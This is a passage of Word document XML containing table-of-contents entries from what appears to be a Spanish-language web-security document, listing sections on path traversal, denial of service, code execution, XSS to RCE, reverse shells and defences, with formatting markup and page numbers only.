                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>174</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="5E6DEBDC" w14:textId="3C24E5CA" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC2"/>
                <w:tabs>
                  <w:tab w:val="left" w:pos="660"/>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034168" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>e)</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>Path Transversal</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034168 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>178</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="39FE3DE0" w14:textId="1BFED1F8" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC2"/>
                <w:tabs>
                  <w:tab w:val="left" w:pos="660"/>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034169" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>f)</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>Negación de servicio -&gt;</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034169 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>190</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="699883E1" w14:textId="2BCA3611" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC3"/>
                <w:tabs>
                  <w:tab w:val="left" w:pos="880"/>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034170" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>i.</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>DoS – Salir del servidor</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034170 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>191</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="1B082FD9" w14:textId="2B6F4FB0" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC3"/>
                <w:tabs>
                  <w:tab w:val="left" w:pos="880"/>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034171" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>ii.</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>DoS – Sobrecarga del servidor</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034171 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>198</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="24205AE5" w14:textId="66B5A97F" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC2"/>
                <w:tabs>
                  <w:tab w:val="left" w:pos="660"/>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034172" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:t>g)</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:t>Code execution</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034172 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>205</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="084BCC7A" w14:textId="2BEE3242" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC2"/>
                <w:tabs>
                  <w:tab w:val="left" w:pos="660"/>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034173" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:t>h)</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:t>XSS to RCE</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034173 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>210</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="5EF00A28" w14:textId="63627C85" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC3"/>
                <w:tabs>
                  <w:tab w:val="left" w:pos="880"/>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034174" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:t></w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:t>Forma 1 -&gt;</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034174 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>210</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="39C29652" w14:textId="133FE264" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC3"/>
                <w:tabs>
                  <w:tab w:val="left" w:pos="880"/>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034175" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t></w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>Forma 2-&gt;</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034175 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>213</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="790D8FF1" w14:textId="1215C309" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC2"/>
                <w:tabs>
                  <w:tab w:val="left" w:pos="660"/>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034176" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>i)</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>Reverse shell:</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034176 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>214</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="18580DAF" w14:textId="69A736E8" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC1"/>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034177" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>7.</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>Defensa</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034177 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>235</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="0511B33E" w14:textId="069EED7D" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC2"/>
                <w:tabs>
                  <w:tab w:val="left" w:pos="660"/>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034178" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>A)</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>File Upload XSS -&gt;</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034178 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>235</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="1315FBA3" w14:textId="58F45E63" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC2"/>
                <w:tabs>
                  <w:tab w:val="left" w:pos="660"/>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034179" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>B)</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>XSS Reflejado -&gt;</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
